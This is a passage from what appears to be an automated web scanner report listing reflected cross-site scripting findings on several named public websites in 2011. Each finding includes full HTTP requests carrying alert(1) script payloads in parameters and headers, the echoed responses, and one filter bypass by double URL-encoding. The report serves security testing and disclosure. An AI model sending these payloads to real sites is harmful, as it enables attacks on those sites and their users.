Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:27:11 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 13352

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...
ript">
$(function() {
function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "https://www.salsalabs.com/favicon.ico89371"-alert(1)-"db10ed2c3c4?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({
modal: true,
widt
...[SNIP]...

3.182. http://www.skymall.com/shopping/dept.htm [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.skymall.com
Path:   /shopping/dept.htm

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed2be"%3balert(1)//3e04ad354f9 was submitted in the c parameter. This input was echoed as ed2be";alert(1)//3e04ad354f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping/dept.htm?c=10500ed2be"%3balert(1)//3e04ad354f9 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 17:46:21 GMT
Connection: close
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 17:46:21 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 17:46:21 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 17:46:21 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 17:46:21 GMT
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 17:46:21 GMT
Content-Length: 156935


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...
<script language="javascript1.1" type="text/javascript">
   
       cmCreatePageviewTag("Dept: Level 1: Sports: Fitness Equipment: Abs & Waist","","10500ed2be";alert(1)//3e04ad354f9","");
   

//-->
...[SNIP]...

3.183. http://www.skymall.com/shopping/subdept.htm [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.skymall.com
Path:   /shopping/subdept.htm

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41b40"%3balert(1)//971f44b87cd was submitted in the c parameter. This input was echoed as 41b40";alert(1)//971f44b87cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping/subdept.htm?c=10296191641b40"%3balert(1)//971f44b87cd HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/dept.htm?c=10500
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; PRODUCTCMPRODCAT=; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496152997; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.2.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496223348; cmRS=&t1=1303494352983&t2=1303494355803&t3=1303494423347&t4=1303494352911&lti=1303494423347&ln=Outdoor%20Holiday%20Decor&hr=/shopping/subdept.htm%3Fc%3D102961916%26cm_re%3DInsideOutdoorLiving-_-OutdoorHolidayDecor-_-Image&fti=&fn=search%3A0%3Bjoinemail%3A1%3BselTpPkFrm%3A2%3B&ac=&fd=&uer=&fu=&pi=Dept%3A%20Level%201%3A%20Outdoor%20Living&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 17:48:12 GMT
Connection: close
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 17:48:09 GMT
Set-Cookie: PRODUCT203458153CMPRODCAT="10500: Promo"; Expires=Fri, 06-May-2011 17:48:09 GMT
Set-Cookie: PRODUCT203459330CMPRODCAT="10500: Promo"; Expires=Fri, 06-May-2011 17:48:09 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 17:48:12 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 17:48:12 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 17:48:12 GMT
Set-Cookie: brwshist_0=pid_203458153_; Expires=Sun, 21-Apr-2013 17:48:12 GMT
Set-Cookie: brwshist_1=pid_203459330_; Expires=Sun, 21-Apr-2013 17:48:12 GMT
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 17:48:12 GMT
Set-Cookie: PRODUCT203458153CMPRODCAT="10500: Promo"; Expires=Fri, 06-May-2011 17:48:12 GMT
Set-Cookie: PRODUCT203459330CMPRODCAT="10500: Promo"; Expires=Fri, 06-May-2011 17:48:12 GMT
Content-Length: 424025


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...
<script language="javascript1.1" type="text/javascript">
   
       cmCreatePageviewTag("Dept: Level 2: : p1","","10296191641b40";alert(1)//971f44b87cd","");
   

//-->
...[SNIP]...

3.184. http://www.swiftpage1.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swiftpage1.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 873a5%253cscript%253ealert%25281%2529%253c%252fscript%253ef27de3394b7 was submitted in the REST URL parameter 1. This input was echoed as 873a5<script>alert(1)</script>f27de3394b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico873a5%253cscript%253ealert%25281%2529%253c%252fscript%253ef27de3394b7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage1.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Date: Fri, 22 Apr 2011 15:22:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592


               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage1.com/spe404.aspx?404;http://www.swiftpage1.com:80/favicon.ico873a5<script>alert(1)</script>f27de3394b7<br>
...[SNIP]...

3.185. http://www.swiftpage1.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swiftpage1.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bbbe9<script>alert(1)</script>e263f3ff8a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?bbbe9<script>alert(1)</script>e263f3ff8a6=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage1.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Date: Fri, 22 Apr 2011 15:22:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592


               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage1.com/spe404.aspx?404;http://www.swiftpage1.com:80/favicon.ico?bbbe9<script>alert(1)</script>e263f3ff8a6=1<br>
...[SNIP]...

3.186. http://www.ubi.com/resources/scripts/sifr_init_js.aspx [path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ubi.com
Path:   /resources/scripts/sifr_init_js.aspx

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload ce345<script>alert(1)</script>25f446fe2ba was submitted in the path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/sifr_init_js.aspx?path=/resources/ce345<script>alert(1)</script>25f446fe2ba HTTP/1.1
Host: www.ubi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ad0whkvvbjyq5l552vkp0wqm

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 22 Apr 2011 15:34:44 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 831

/*
Author: AKQA
Date: 10-24-2008

This file supports the use of SIFR by dynamically setting the absolute path for whichever environment the application run on.

For example, development sites ru
...[SNIP]...
lopment sites,
this file will add "portal" to the src string.
*/

if (!(navigator.platform && navigator.platform == "MacPPC" && BrowserObject.Engine.gecko19)){
   var gotham = {
       src: '/resources/ce345<script>alert(1)</script>25f446fe2baassets/flash/gotham.swf'
   }

   sIFR.activate(gotham);

   sIFR.replace(gotham, {
       wmode:'transparent',
       forceWidth:true,
       selector: 'h1#global-header',
       css: {
           '.sIFR-root': {
               'font-
...[SNIP]...

3.187. http://www.ubi.com/resources/ubi_stylesheet_png.aspx [path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ubi.com
Path:   /resources/ubi_stylesheet_png.aspx

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload 9470d<script>alert(1)</script>3c4a6bfe622 was submitted in the path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/ubi_stylesheet_png.aspx?path=/resources/9470d<script>alert(1)</script>3c4a6bfe622 HTTP/1.1
Host: www.ubi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ad0whkvvbjyq5l552vkp0wqm

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 22 Apr 2011 15:34:02 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/css; charset=utf-8
Content-Length: 4590

/*
Author: AKQA
Date: 10-24-2008

This file supports the use of PNG files. Since IE6 requires PNG's to be absolutely specified, this file will programatically add the correct
information to the
...[SNIP]...
*/

/*=========== GLOBAL ============*/
#global-content-wrapper #side-column .wrapper div.divider{
   _background:none;
   _filter: progid:DXImageTransform.Microsoft.AlphaImageLoader (src='/resources/9470d<script>alert(1)</script>3c4a6bfe622images/style/global/divleftcolumn.png',sizingMethod='image');
}
#global-content-wrapper #side-column div#btn-submit-container a.button{
   _background:none;
   _filter: progid:DXImageTransform.Microsof
...[SNIP]...

3.188. http://www.blacksingles.com/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.blacksingles.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6a87"%3balert(1)//2fec8277eb7 was submitted in the Referer HTTP header. This input was echoed as f6a87";alert(1)//2fec8277eb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blacksingles.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=f6a87"%3balert(1)//2fec8277eb7

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:09:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: al-amho=; expires=Thu, 21-Apr-2011 16:09:20 GMT; path=/
Set-Cookie: al-juso=; expires=Thu, 21-Apr-2011 16:09:20 GMT; path=/
Set-Cookie: SparkUPS=; expires=Thu, 21-Apr-2011 16:09:20 GMT; path=/
Set-Cookie: OmnitureSessionCheck=2011-04-22 09:09:20Z; path=/
Set-Cookie: REG091202=REG091202&prm=55020&ScenarioFile=/Applications/Registration/XML/SplashRegistration_9051.xml&ScenarioName=Scenario 22&LAST_COMPLETED_STEP=0&CURRENT_STEP=1&SESSION_ID=e236421c-efa0-48f4-afab-9572cfe1e44e&START_STEP_ID=1; expires=Sun, 22-May-2011 16:09:20 GMT; path=/
Set-Cookie: mnc5=sid=e236421c-efa0-48f4-afab-9572cfe1e44e; domain=.BlackSingles.com; expires=Sun, 22-Apr-2012 16:09:20 GMT; path=/
Set-Cookie: mnc5_PromotionID=objname=PromotionID&sliding=False&val=66301&days=3&dateExp=4%2f25%2f2011+9%3a09%3a20+AM&hash=J3Qr8WUHO0pkpC1yMSV83Q%3d%3d; domain=.BlackSingles.com; expires=Mon, 25-Apr-2011 16:09:20 GMT; path=/
Set-Cookie: mnc5_Luggage=objname=Luggage&sliding=False&val=%3fhl%3den%26q%3df6a87%2522%253balert(1)%2f%2f2fec8277eb7&days=3&dateExp=4%2f25%2f2011+9%3a09%3a20+AM&hash=%2fdSOJfFbKXwxUCMVTERrZg%3d%3d; domain=.BlackSingles.com; expires=Mon, 25-Apr-2011 16:09:20 GMT; path=/
Cache-Control: no-store
Content-Type: text/html; charset=utf-8
Content-Length: 72170
Set-Cookie: NSC_wjq_hmpcbm.tqbsl.dpn_80=ffffffff43184f3445525d5f4f58455e445a4a423660;expires=Fri, 22-Apr-2011 16:11:20 GMT;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7 no-js" xml:lang="en" lang=
...[SNIP]...
s.prop23 = (clearValue) ? "" : "";
s.prop24 = (clearValue) ? "" : "";
s.prop27 = (clearValue) ? "" : "";
s.prop29 = (clearValue) ? "" : "http://www.google.com/search?hl=en&q=f6a87";alert(1)//2fec8277eb7";
s.prop30 = (clearValue) ? "" : "";
s.prop31 = (clearValue) ? "" : "";
s.prop32 = (clearValue) ? "" : "";
s.prop33 = (clearValue) ? "" : "";
s.prop36 = (c
...[SNIP]...

3.189. http://www.palomar.edu/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.palomar.edu
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload ebfcd<script>alert(1)</script>23b35df6fea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.palomar.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=ebfcd<script>alert(1)</script>23b35df6fea

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:06:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4692


<html>

<head>

<meta http-equiv="Content-Language" content="en-us">
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">

<titl
...[SNIP]...
<br>
                   REFERER -
                   http://www.google.com/search?hl=en&q=ebfcd<script>alert(1)</script>23b35df6fea
                   <hr width="85%" align="center">
...[SNIP]...

3.190. http://www.palomar.edu/favicon.ico [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.palomar.edu
Path:   /favicon.ico

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload e05ad<script>alert(1)</script>be5d4d0f272 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3e05ad<script>alert(1)</script>be5d4d0f272
Host: www.palomar.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:06:48 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4655


<html>

<head>

<meta http-equiv="Content-Language" content="en-us">
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">

<titl
...[SNIP]...
<br>
                   BROWSER -
                   curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3e05ad<script>alert(1)</script>be5d4d0f272
                   <br>
...[SNIP]...

3.191. https://www.salsalabs.com/dia/hq/css/custom.css [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.salsalabs.com
Path:   /dia/hq/css/custom.css

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a5e65'><script>alert(1)</script>f275fdc8f15 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /dia/hq/css/custom.css HTTP/1.1
Host: www.salsalabs.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=a5e65'><script>alert(1)</script>f275fdc8f15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:27:07 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 1326

<div id="404container" class="error404">
<h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>


<p>It looks like you've requested a page that is cu
...[SNIP]...
<a href='http://www.google.com/search?hl=en&q=a5e65'><script>alert(1)</script>f275fdc8f15'>
...[SNIP]...

3.192. https://www.salsalabs.com/dia/hq/css/custom.css [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.salsalabs.com
Path:   /dia/hq/css/custom.css

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload aecea<script>alert(1)</script>73d9521b5ce was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /dia/hq/css/custom.css HTTP/1.1
Host: www.salsalabs.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=aecea<script>alert(1)</script>73d9521b5ce
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:27:07 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 1322

<div id="404container" class="error404">
<h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>


<p>It looks like you've requested a page that is cu
...[SNIP]...
</script>73d9521b5ce'>http://www.google.com/search?hl=en&q=aecea<script>alert(1)</script>73d9521b5ce</a>
...[SNIP]...

3.193. https://www.salsalabs.com/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.salsalabs.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 7db98<script>alert(1)</script>5eea73835cc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
Host: www.salsalabs.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
